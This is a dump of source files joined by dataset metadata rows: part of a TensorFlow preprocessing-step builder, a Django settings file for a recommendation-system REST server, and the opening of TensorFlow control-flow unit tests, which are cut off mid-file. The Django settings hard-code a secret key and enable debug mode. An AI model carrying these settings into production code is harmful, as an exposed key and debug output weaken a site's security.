kwargs['min_padded_size_ratio'] = tuple(min_padded_size_ratio)
if max_padded_size_ratio:
kwargs['max_padded_size_ratio'] = tuple(max_padded_size_ratio)
return (preprocessor.random_crop_pad_image, kwargs)
if step_type == 'random_resize_method':
config = preprocessor_step_config.random_resize_method
return (preprocessor.random_resize_method,
{
'target_size': [config.target_height, config.target_width],
})
if step_type == 'resize_image':
config = preprocessor_step_config.resize_image
method = RESIZE_METHOD_MAP[config.method]
return (preprocessor.resize_image,
{
'new_height': config.new_height,
'new_width': config.new_width,
'method': method
})
if step_type == 'random_self_concat_image':
config = preprocessor_step_config.random_self_concat_image
return (preprocessor.random_self_concat_image, {
'concat_vertical_probability': config.concat_vertical_probability,
'concat_horizontal_probability': config.concat_horizontal_probability
})
if step_type == 'ssd_random_crop':
config = preprocessor_step_config.ssd_random_crop
if config.operations:
min_object_covered = [op.min_object_covered for op in config.operations]
aspect_ratio_range = [(op.min_aspect_ratio, op.max_aspect_ratio)
for op in config.operations]
area_range = [(op.min_area, op.max_area) for op in config.operations]
overlap_thresh = [op.overlap_thresh for op in config.operations]
clip_boxes = [op.clip_boxes for op in config.operations]
random_coef = [op.random_coef for op in config.operations]
return (preprocessor.ssd_random_crop,
{
'min_object_covered': min_object_covered,
'aspect_ratio_range': aspect_ratio_range,
'area_range': area_range,
'overlap_thresh': overlap_thresh,
'clip_boxes': clip_boxes,
'random_coef': random_coef,
})
return (preprocessor.ssd_random_crop, {})
if step_type == 'autoaugment_image':
config = preprocessor_step_config.autoaugment_image
return (preprocessor.autoaugment_image, {
'policy_name': config.policy_name,
})
if step_type == 'drop_label_probabilistically':
config = preprocessor_step_config.drop_label_probabilistically
return (preprocessor.drop_label_probabilistically, {
'dropped_label': config.label,
'drop_probability': config.drop_probability,
})
if step_type == 'remap_labels':
config = preprocessor_step_config.remap_labels
return (preprocessor.remap_labels, {
'original_labels': config.original_labels,
'new_label': config.new_label
})
if step_type == 'ssd_random_crop_pad':
config = preprocessor_step_config.ssd_random_crop_pad
if config.operations:
min_object_covered = [op.min_object_covered for op in config.operations]
aspect_ratio_range = [(op.min_aspect_ratio, op.max_aspect_ratio)
for op in config.operations]
area_range = [(op.min_area, op.max_area) for op in config.operations]
overlap_thresh = [op.overlap_thresh for op in config.operations]
clip_boxes = [op.clip_boxes for op in config.operations]
random_coef = [op.random_coef for op in config.operations]
min_padded_size_ratio = [tuple(op.min_padded_size_ratio)
for op in config.operations]
max_padded_size_ratio = [tuple(op.max_padded_size_ratio)
for op in config.operations]
pad_color = [(op.pad_color_r, op.pad_color_g, op.pad_color_b)
for op in config.operations]
return (preprocessor.ssd_random_crop_pad,
{
'min_object_covered': min_object_covered,
'aspect_ratio_range': aspect_ratio_range,
'area_range': area_range,
'overlap_thresh': overlap_thresh,
'clip_boxes': clip_boxes,
'random_coef': random_coef,
'min_padded_size_ratio': min_padded_size_ratio,
'max_padded_size_ratio': max_padded_size_ratio,
'pad_color': pad_color,
})
return (preprocessor.ssd_random_crop_pad, {})
if step_type == 'ssd_random_crop_fixed_aspect_ratio':
config = preprocessor_step_config.ssd_random_crop_fixed_aspect_ratio
if config.operations:
min_object_covered = [op.min_object_covered for op in config.operations]
area_range = [(op.min_area, op.max_area) for op in config.operations]
overlap_thresh = [op.overlap_thresh for op in config.operations]
clip_boxes = [op.clip_boxes for op in config.operations]
random_coef = [op.random_coef for op in config.operations]
return (preprocessor.ssd_random_crop_fixed_aspect_ratio,
{
'min_object_covered': min_object_covered,
'aspect_ratio': config.aspect_ratio,
'area_range': area_range,
'overlap_thresh': overlap_thresh,
'clip_boxes': clip_boxes,
'random_coef': random_coef,
})
return (preprocessor.ssd_random_crop_fixed_aspect_ratio, {})
if step_type == 'ssd_random_crop_pad_fixed_aspect_ratio':
config = preprocessor_step_config.ssd_random_crop_pad_fixed_aspect_ratio
kwargs = {}
aspect_ratio = config.aspect_ratio
if aspect_ratio:
kwargs['aspect_ratio'] = aspect_ratio
min_padded_size_ratio = config.min_padded_size_ratio
if min_padded_size_ratio:
if len(min_padded_size_ratio) != 2:
raise ValueError('min_padded_size_ratio should have 2 elements if set!')
kwargs['min_padded_size_ratio'] = tuple(min_padded_size_ratio)
max_padded_size_ratio = config.max_padded_size_ratio
if max_padded_size_ratio:
if len(max_padded_size_ratio) != 2:
raise ValueError('max_padded_size_ratio should have 2 elements if set!')
kwargs['max_padded_size_ratio'] = tuple(max_padded_size_ratio)
if config.operations:
kwargs['min_object_covered'] = [op.min_object_covered
for op in config.operations]
kwargs['aspect_ratio_range'] = [(op.min_aspect_ratio, op.max_aspect_ratio)
for op in config.operations]
kwargs['area_range'] = [(op.min_area, op.max_area)
for op in config.operations]
kwargs['overlap_thresh'] = [op.overlap_thresh for op in config.operations]
kwargs['clip_boxes'] = [op.clip_boxes for op in config.operations]
kwargs['random_coef'] = [op.random_coef for op in config.operations]
return (preprocessor.ssd_random_crop_pad_fixed_aspect_ratio, kwargs)
if step_type == 'random_square_crop_by_scale':
config = preprocessor_step_config.random_square_crop_by_scale
return preprocessor.random_square_crop_by_scale, {
'scale_min': config.scale_min,
'scale_max': config.scale_max,
'max_border': config.max_border,
'num_scales': config.num_scales
}
if step_type == 'random_scale_crop_and_pad_to_square':
config = preprocessor_step_config.random_scale_crop_and_pad_to_square
return preprocessor.random_scale_crop_and_pad_to_square, {
'scale_min': config.scale_min,
'scale_max': config.scale_max,
'output_size': config.output_size,
}
if step_type == 'random_jitter_boxes':
config = preprocessor_step_config.random_jitter_boxes
kwargs = get_random_jitter_kwargs(config)
return preprocessor.random_jitter_boxes, kwargs
raise ValueError('Unknown preprocessing step.')
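
# Example usage (illustrative sketch, not part of the original module; the
# text-format config below is made up for demonstration):
#
#   from google.protobuf import text_format
#   step = text_format.Parse('random_horizontal_flip { probability: 0.5 }',
#                            preprocessor_pb2.PreprocessingStep())
#   preprocess_fn, kwargs = build(step)
#   # preprocess_fn is preprocessor.random_horizontal_flip and kwargs is
#   # {'keypoint_flip_permutation': None, 'probability': 0.5}.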
| apache-2.0 | 2,135,707,827,955,755,500 | 39.979684 | 80 | 0.640961 | false |
tobegit3hub/deep_recommend_system | http_service/restful_server/settings.py | 1 | 3216 | """
Django settings for restful_server project.
Generated by 'django-admin startproject' using Django 1.9.8.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '5jeg*%=e7r7*=z*f-5+uz(l3wbe3&1_#306wc6iry!u4shd7)-'
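# In production, a common pattern is to load the key from the environment
# instead of hard-coding it (sketch; the environment variable name below is
# only an example):
#
#   SECRET_KEY = os.environ.get('DJANGO_SECRET_KEY', SECRET_KEY)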
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'restful_server.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'restful_server.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
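# A production deployment would typically use a server-backed database
# instead of SQLite; a sketch (the engine name is a standard Django backend,
# the credentials are placeholders, and none of this is part of the project
# config):
#
#   DATABASES = {
#       'default': {
#           'ENGINE': 'django.db.backends.postgresql_psycopg2',
#           'NAME': 'recommend_db',
#           'USER': 'recommend_user',
#           'PASSWORD': os.environ.get('DB_PASSWORD', ''),
#           'HOST': 'localhost',
#           'PORT': '5432',
#       }
#   }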
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME':
'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME':
'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME':
'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME':
'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
| apache-2.0 | 7,750,119,693,354,985,000 | 26.02521 | 83 | 0.684701 | false |
xodus7/tensorflow | tensorflow/python/kernel_tests/control_flow_ops_py_test.py | 1 | 124988 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=g-long-lambda
"""Tests for tensorflow.ops.control_flow_ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import math
import time
import unittest
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.client import device_lib
from tensorflow.python.client import session
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import cond_v2 # pylint: disable=unused-import
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import functional_ops
from tensorflow.python.ops import gen_array_ops
from tensorflow.python.ops import gen_control_flow_ops
from tensorflow.python.ops import gen_data_flow_ops
from tensorflow.python.ops import gen_logging_ops
from tensorflow.python.ops import gen_state_ops
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import linalg_ops
from tensorflow.python.ops import logging_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_grad # pylint: disable=unused-import
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
# pylint: disable=unused-import
import tensorflow.python.ops.tensor_array_grad
# pylint: enable=unused-import
from tensorflow.python.platform import test
from tensorflow.python.training import adam
from tensorflow.python.training import gradient_descent
from tensorflow.python.util import nest
def check_consumers(graph):
"""Sanity check on the consumer list of the tensors."""
consumer_count = {}
for op in graph.get_operations():
for v in op.inputs:
cnt = consumer_count.get(v, 0)
consumer_count[v] = cnt + 1
for k, v in consumer_count.items():
if len(k.consumers()) != v:
return False
return True
def all_fetchables():
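  """Returns the names of all fetchable tensors in the default graph."""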
tensor_names = []
graph = ops.get_default_graph()
for op in graph.get_operations():
for t in op.outputs:
if graph.is_fetchable(t):
tensor_names.append(t.name)
return tensor_names
def all_feedables():
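  """Returns all feedable tensors that appear as op inputs in the default
  graph."""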
feedable_tensors = []
graph = ops.get_default_graph()
for op in graph.get_operations():
for t in op.inputs:
if graph.is_feedable(t):
feedable_tensors.append(t)
return feedable_tensors
def opt_cfg():
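  """Returns a ConfigProto with L1 optimization, function inlining, and
  constant folding enabled, used to exercise optimized-graph code paths."""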
return config_pb2.ConfigProto(
allow_soft_placement=True,
graph_options=config_pb2.GraphOptions(
optimizer_options=config_pb2.OptimizerOptions(
opt_level=config_pb2.OptimizerOptions.L1,
do_function_inlining=True,
do_constant_folding=True)))
def isum(s, maximum_iterations=None):
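  """Returns s plus the sum 0 + 1 + ... + 9, computed with a while_loop.

  If `maximum_iterations` is set, the loop stops after that many iterations;
  e.g. isum(s, maximum_iterations=3) returns s + (0 + 1 + 2).
  """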
i = constant_op.constant(0, name="i")
c = lambda i, s: math_ops.less(i, 10)
b = lambda i, s: [math_ops.add(i, 1), math_ops.add(i, s)]
_, r_s = control_flow_ops.while_loop(
c, b, [i, s], maximum_iterations=maximum_iterations)
return r_s
@test_util.with_cond_v2
class ControlFlowTest(test.TestCase):
def testRefIdentity(self):
with self.cached_session():
v = variables.Variable(7)
v = control_flow_ops._Identity(v)
op = state_ops.assign(v, 9)
v2 = control_flow_ops.with_dependencies([op], v)
self.assertTrue(isinstance(v2, ops.Tensor))
variables.global_variables_initializer().run()
self.assertEqual(9, v2.eval())
def testRefEnter(self):
with self.cached_session():
v = variables.Variable(7)
enter_v = control_flow_ops._Enter(v, "foo_1", is_constant=True)
nine = constant_op.constant(9)
enter_nine = gen_control_flow_ops.enter(nine, "foo_1")
op = state_ops.assign(enter_v, enter_nine)
v2 = control_flow_ops.with_dependencies([op], enter_v)
v3 = control_flow_ops.exit(v2)
variables.global_variables_initializer().run()
self.assertEqual(9, v3.eval())
def testRefSwitch(self):
with self.cached_session():
v = variables.Variable(7)
p = constant_op.constant(True)
v1 = control_flow_ops._SwitchRefOrTensor(v._ref(), p) # pylint: disable=protected-access
v2 = state_ops.assign(v1[1], 9)
variables.global_variables_initializer().run()
self.assertEqual(9, v2.eval())
def testEnterMulExit(self):
with self.cached_session():
data = constant_op.constant([1, 2, 3, 4, 5, 6], name="data")
enter_data = gen_control_flow_ops.enter(data, "foo_1", False)
five = constant_op.constant(5)
enter_five = gen_control_flow_ops.enter(five, "foo_1", False)
mul_op = math_ops.multiply(enter_data, enter_five)
exit_op = control_flow_ops.exit(mul_op)
result = exit_op.eval()
self.assertAllEqual(np.array([x * 5 for x in [1, 2, 3, 4, 5, 6]]), result)
def testEnterShapePropagation(self):
with self.cached_session():
v = variables.Variable([0.0, 0.0], dtype=dtypes.float32)
# If is_constant=True, the shape information should be propagated.
enter_v_constant = gen_control_flow_ops.enter(
v, "frame1", is_constant=True)
self.assertEqual(enter_v_constant.shape, [2])
# Otherwise, the shape should be unknown.
enter_v_non_constant = gen_control_flow_ops.enter(
v, "frame2", is_constant=False)
self.assertEqual(enter_v_non_constant.shape, None)
def testSwitchMergeIndexedSlices(self):
with self.cached_session():
values = constant_op.constant([1, 2, 3, 4, 5, 6])
indices = constant_op.constant([0, 2, 4, 6, 8, 10])
data = ops.IndexedSlices(values, indices)
pred = ops.convert_to_tensor(True)
switch_op = control_flow_ops.switch(data, pred)
merge_op = control_flow_ops.merge(switch_op)[0]
val = merge_op.values.eval()
ind = merge_op.indices.eval()
self.assertAllEqual(np.arange(1, 7), val)
self.assertAllEqual(np.arange(0, 12, 2), ind)
def testSwitchDeadBranch(self):
with self.cached_session():
data = constant_op.constant([1, 2, 3, 4, 5, 6], name="data")
ports = ops.convert_to_tensor(True, name="ports")
switch_op = control_flow_ops.switch(data, ports)
dead_branch = array_ops.identity(switch_op[0])
with self.assertRaisesWithPredicateMatch(
errors_impl.InvalidArgumentError,
lambda e: "Retval[0] does not have value" in str(e)):
dead_branch.eval()
def testSwitchMergeLess(self):
with self.cached_session():
data = constant_op.constant([1, 2, 3, 4, 5, 6], name="data")
zero = ops.convert_to_tensor(0)
one = ops.convert_to_tensor(1)
less_op = math_ops.less(zero, one)
switch_op = control_flow_ops.switch(data, less_op)
merge_op = control_flow_ops.merge(switch_op)[0]
result = merge_op.eval()
self.assertAllEqual(np.arange(1, 7), result)
def testSwitchMergeAddIdentity(self):
with self.cached_session():
data = constant_op.constant([1, 2, 3, 4, 5, 6], name="data")
ports = ops.convert_to_tensor(False, name="ports")
switch_op = control_flow_ops.switch(data, ports)
one = constant_op.constant(1)
add_op = math_ops.add(switch_op[0], one)
id_op = array_ops.identity(switch_op[1])
merge_op = control_flow_ops.merge([add_op, id_op])[0]
result = merge_op.eval()
self.assertAllEqual(np.array([x + 1 for x in [1, 2, 3, 4, 5, 6]]), result)
def testSwitchMergeAddMul(self):
with self.cached_session():
data = constant_op.constant([1, 2, 3, 4, 5, 6], name="data")
ports = ops.convert_to_tensor(True, name="ports")
switch_op = control_flow_ops.switch(data, ports)
one = constant_op.constant(1)
add_op = math_ops.add(switch_op[0], one)
five = constant_op.constant(5)
mul_op = math_ops.multiply(switch_op[1], five)
merge_op = control_flow_ops.merge([add_op, mul_op])[0]
result = merge_op.eval()
self.assertAllEqual(np.array([x * 5 for x in [1, 2, 3, 4, 5, 6]]), result)
def testLoop_false(self):
with self.cached_session():
false = ops.convert_to_tensor(False)
n = constant_op.constant(10)
enter_false = gen_control_flow_ops.enter(false, "foo_1", False)
enter_n = gen_control_flow_ops.enter(n, "foo_1", False)
merge_n = control_flow_ops.merge([enter_n, enter_n], name="merge_n")[0]
switch_n = control_flow_ops.switch(merge_n, enter_false)
exit_n = control_flow_ops.exit(switch_n[0])
next_n = control_flow_ops.next_iteration(switch_n[0])
merge_n.op._update_input(1, next_n)
result = exit_n.eval()
self.assertAllEqual(10, result)
def testLoop_1(self):
with self.cached_session():
zero = constant_op.constant(0)
one = constant_op.constant(1)
n = constant_op.constant(10)
enter_i = gen_control_flow_ops.enter(zero, "foo", False)
enter_one = gen_control_flow_ops.enter(one, "foo", True)
enter_n = gen_control_flow_ops.enter(n, "foo", True)
with ops.device(test.gpu_device_name()):
merge_i = control_flow_ops.merge([enter_i, enter_i])[0]
less_op = math_ops.less(merge_i, enter_n)
cond_op = control_flow_ops.loop_cond(less_op)
switch_i = control_flow_ops.switch(merge_i, cond_op)
add_i = math_ops.add(switch_i[1], enter_one)
next_i = control_flow_ops.next_iteration(add_i)
merge_i.op._update_input(1, next_i)
exit_i = control_flow_ops.exit(switch_i[0])
result = exit_i.eval()
self.assertAllEqual(10, result)
def testLoop_2(self):
with self.cached_session():
zero = constant_op.constant(0)
one = constant_op.constant(1)
n = constant_op.constant(10)
enter_i = gen_control_flow_ops.enter(zero, "foo", False)
enter_one = gen_control_flow_ops.enter(one, "foo", True)
enter_n = gen_control_flow_ops.enter(n, "foo", True)
merge_i = control_flow_ops.merge([enter_i, enter_i])[0]
less_op = math_ops.less(merge_i, enter_n)
cond_op = control_flow_ops.loop_cond(less_op)
switch_i = control_flow_ops.switch(merge_i, cond_op)
add_i = math_ops.add(switch_i[1], enter_one)
with ops.device(test.gpu_device_name()):
next_i = control_flow_ops.next_iteration(add_i)
merge_i.op._update_input(1, next_i)
exit_i = control_flow_ops.exit(switch_i[0])
result = exit_i.eval()
self.assertAllEqual(10, result)
def testDifferentFrame(self):
with self.cached_session():
data = array_ops.placeholder(dtypes.float32, shape=[])
enter_1 = gen_control_flow_ops.enter(data, "foo_1", False)
enter_2 = gen_control_flow_ops.enter(data, "foo_2", False)
res = math_ops.add(enter_1, enter_2)
with self.assertRaisesOpError("has inputs from different frames"):
res.eval(feed_dict={data: 1.0})
def testCondBool(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/113296297")
values = constant_op.constant(10)
fn1 = lambda: math_ops.add(values, 1)
fn2 = lambda: math_ops.subtract(values, 1)
with self.assertRaisesRegexp(TypeError, "must not be a Python bool"):
_ = control_flow_ops.cond(False, fn1, fn2)
def testCondInt(self):
p = array_ops.placeholder(dtypes.bool, shape=[])
v = constant_op.constant(10)
fn1 = lambda: math_ops.add(v, 1)
fn2 = lambda: math_ops.subtract(v, 1)
y = control_flow_ops.cond(p, fn1, fn2)
grad = gradients_impl.gradients(y, [v])
self.assertAllEqual([None], grad)
def testFetchable(self):
with self.cached_session() as sess:
x = array_ops.placeholder(dtypes.float32)
control_flow_ops.cond(
constant_op.constant(True), lambda: x + 2, lambda: x + 0)
graph = ops.get_default_graph()
for op in graph.get_operations():
for t in op.inputs:
if graph.is_fetchable(t.op):
sess.run(t, feed_dict={x: 3})
else:
with self.assertRaisesRegexp(ValueError,
"has been marked as not fetchable"):
sess.run(t, feed_dict={x: 3})
def testFeedable(self):
with self.cached_session() as sess:
c = constant_op.constant(2)
i0 = constant_op.constant(0)
r = control_flow_ops.while_loop(lambda i: i < 1000,
lambda i: math_ops.square(c) + i, [i0])
self.assertEqual(1000, r.eval(feed_dict={i0: 0}))
feedable_tensors = all_feedables()
for t in feedable_tensors:
sess.run(r, feed_dict={t: 3})
graph = ops.get_default_graph()
for op in graph.get_operations():
for t in op.inputs:
if t not in feedable_tensors and t.dtype is dtypes.int32:
with self.assertRaisesRegexp(ValueError, "may not be fed"):
sess.run(r, feed_dict={t: 3})
def testCondIndexedSlices(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/113296180")
with self.cached_session():
values = constant_op.constant(10)
indices = constant_op.constant(0)
x = ops.IndexedSlices(values, indices)
pred = math_ops.less(1, 2)
fn1 = lambda: ops.IndexedSlices(math_ops.add(x.values, 1), indices)
fn2 = lambda: ops.IndexedSlices(math_ops.subtract(x.values, 1), indices)
r = control_flow_ops.cond(pred, fn1, fn2)
val = r.values.eval()
ind = r.indices.eval()
self.assertAllEqual(11, val)
self.assertAllEqual(0, ind)
def testCondSparseTensor(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/113296161 (SparseTensors)")
with self.cached_session():
values = constant_op.constant([2.0, 4.0], name="values")
indices = constant_op.constant(
[[0], [3]], dtype=dtypes.int64, name="indices")
shape = constant_op.constant([10], dtype=dtypes.int64, name="dense_shape")
x = sparse_tensor.SparseTensor(indices, values, dense_shape=shape)
pred = math_ops.less(1, 2)
fn1 = lambda: sparse_tensor.SparseTensor(
indices + 1, x.values + 1, dense_shape=shape)
fn2 = lambda: sparse_tensor.SparseTensor(
indices, x.values - 1, dense_shape=shape)
r = control_flow_ops.cond(pred, fn1, fn2)
self.assertAllEqual([3.0, 5.0], r.values.eval())
self.assertAllEqual([[1], [4]], r.indices.eval())
self.assertAllEqual(r.values.get_shape(), (2,))
def testCondResource(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/111124878 (don't return tuple)")
with self.cached_session():
rv = resource_variable_ops.ResourceVariable(True)
variables.global_variables_initializer().run()
t = ops.convert_to_tensor(1.0)
def case():
assign = resource_variable_ops.assign_variable_op(rv.handle, False)
with ops.control_dependencies([assign]):
return array_ops.identity(t)
self.assertEqual(1.0, control_flow_ops.cond(rv, case, lambda: t).eval())
def testCondIndexedSlicesDifferentTypes(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/113293074")
with self.cached_session():
values = constant_op.constant(10)
i_32 = ops.convert_to_tensor(0, name="one", dtype=dtypes.int32)
i_64 = ops.convert_to_tensor(0, name="one", dtype=dtypes.int64)
x = ops.IndexedSlices(values, i_32)
pred = math_ops.less(1, 2)
fn1 = lambda: ops.IndexedSlices(math_ops.add(x.values, 1), i_32)
fn2 = lambda: ops.IndexedSlices(math_ops.subtract(x.values, 1), i_64)
r = control_flow_ops.cond(pred, fn1, fn2)
val = r.values.eval()
ind = r.indices.eval()
self.assertAllEqual(11, val)
self.assertAllEqual(0, ind)
self.assertTrue(ind.dtype == np.int64)
def testCondColocation(self):
with self.test_session(use_gpu=True):
with ops.device("/cpu:0"):
v = variables.Variable(7.0)
x = constant_op.constant(10.0)
pred = math_ops.less(1.0, 2.0)
fn1 = lambda: math_ops.add(v, 1.0)
fn2 = lambda: math_ops.subtract(x, 1.0)
r = control_flow_ops.cond(pred, fn1, fn2)
for op in x.graph.get_operations():
if op.name == "cond/Add/Switch":
self.assertDeviceEqual(op.device, "/cpu:0")
def _testCond_1(self, use_gpu):
with self.test_session(use_gpu=use_gpu):
x = constant_op.constant(10)
pred = math_ops.less(1, 2)
fn1 = lambda: math_ops.add(x, 1)
fn2 = lambda: math_ops.subtract(x, 1)
r = control_flow_ops.cond(pred, fn1, fn2)
result = r.eval()
self.assertAllEqual(11, result)
def testCond_1(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/111124878 (don't return tuple)")
self._testCond_1(use_gpu=False)
self._testCond_1(use_gpu=True)
def testCond_2(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/111124878 (don't return tuple)")
with self.cached_session():
x = constant_op.constant(10)
r = control_flow_ops.cond(
math_ops.less(1, 0), lambda: math_ops.add(x, 1),
lambda: math_ops.subtract(x, 1))
result = r.eval()
self.assertAllEqual(9, result)
def testCond_3(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/111124878 (don't return tuple)")
with self.cached_session():
x = constant_op.constant(10)
pred = math_ops.less(1, 2)
fn1 = lambda: math_ops.add(x, 1)
fn2 = lambda: math_ops.subtract(x, 1)
fn3 = lambda: math_ops.add(control_flow_ops.cond(pred, fn1, fn2), 1)
r = control_flow_ops.cond(pred, fn3, fn2)
result = r.eval()
self.assertAllEqual(12, result)
def testCond_4(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/113324949 (ref vars)")
with self.cached_session():
v1 = variables.Variable(7)
v2 = variables.Variable(7)
v3 = variables.Variable(7)
age = constant_op.constant(3)
max_age = constant_op.constant(2)
pred = math_ops.greater(age, max_age)
fn1 = lambda: [state_ops.assign(v1, 1).op, state_ops.assign(v2, 2).op]
fn2 = lambda: [state_ops.assign(v3, 3).op, constant_op.constant(10).op]
r = control_flow_ops.cond(pred, fn1, fn2)
variables.global_variables_initializer().run()
self.assertEqual(len(r), 2)
result = r[1].eval()
self.assertAllEqual(True, result)
self.assertAllEqual(7, v1.eval())
self.assertAllEqual(2, v2.eval())
self.assertAllEqual(7, v3.eval())
def testCond_5(self):
with self.cached_session():
alive = constant_op.constant(True, name="alive")
count = constant_op.constant(0, name="count")
def body(i):
return control_flow_ops.cond(
alive, lambda: [math_ops.less(i, 3), math_ops.add(count, 1)],
lambda: [alive, count])
for i in range(10):
alive, count = body(i)
self.assertAllEqual(4, count.eval())
def testCond_6(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/111124878 (don't return tuple)")
with self.cached_session():
v1 = variables.Variable([7])
age = constant_op.constant(3)
pred = math_ops.greater(age, 4)
fn1 = lambda: age
fn2 = lambda: v1
r = control_flow_ops.cond(pred, fn1, fn2)
variables.global_variables_initializer().run()
result = r.eval()
self.assertAllEqual(np.array([7]), result)
def testCond_7(self):
with self.cached_session() as sess:
x = constant_op.constant(10)
y = constant_op.constant(200)
pred = math_ops.less(1, 2)
fn1 = lambda: [math_ops.add(x, 1), math_ops.add(x, 2)]
fn2 = lambda: [y, y]
r = control_flow_ops.cond(pred, fn1, fn2)
self.assertAllEqual([11, 12], sess.run(r))
def testCondRef(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/111124878 (don't return tuple)")
with self.cached_session():
x = gen_state_ops.variable(
shape=[1],
dtype=dtypes.float32,
name="x",
container="",
shared_name="")
true_fn = lambda: x
false_fn = lambda: constant_op.constant([2.0])
r = control_flow_ops.cond(constant_op.constant(False), true_fn, false_fn)
self.assertAllEqual([2.0], r.eval())
def testCondWithControl(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/79881896")
with self.cached_session():
control_holder = array_ops.placeholder(dtypes.float32, shape=())
a = constant_op.constant(3)
def true_branch():
with ops.control_dependencies([control_holder]):
_ = a + 1
return a + 2
r = control_flow_ops.cond(
constant_op.constant(True), true_branch,
lambda: constant_op.constant(1))
self.assertEqual(5, r.eval())
def testUninitializedRefIdentity(self):
with self.cached_session() as sess:
v = gen_state_ops.variable(
shape=[1],
dtype=dtypes.float32,
name="v",
container="",
shared_name="")
inited = state_ops.is_variable_initialized(v)
v_f, v_t = control_flow_ops.ref_switch(v, inited)
      # Both v_f and v_t are uninitialized references. However, an actual use
      # of the reference in the 'true' branch by the 'tf.identity' op will
      # not 'fire' when v is uninitialized, so this is a valid construction.
      # This test verifies that ref_identity accepts an uninitialized ref as
      # input, so this construction is allowed.
v_f_op = gen_array_ops.ref_identity(v_f)
v_t_op = gen_array_ops.ref_identity(v_t)
with ops.control_dependencies([v_f_op]):
assign_v = state_ops.assign(v, [1.0])
with ops.control_dependencies([v_t_op]):
orig_v = array_ops.identity(v)
merged_op = control_flow_ops.merge([assign_v, orig_v])
self.assertAllEqual([1.0], sess.run(merged_op.output))
def testCondSwitchIdentity(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/112477618 (Operation returned from cond)")
    # Make sure the switch identity is not removed by optimization.
with session.Session(config=opt_cfg()) as sess:
pred = constant_op.constant(True)
def fn1():
return control_flow_ops.no_op()
def fn2():
return control_flow_ops.Assert(False, ["Wrong branch!!!"])
r = control_flow_ops.cond(pred, fn1, fn2)
sess.run(r)
def testCondRecvIdentity(self):
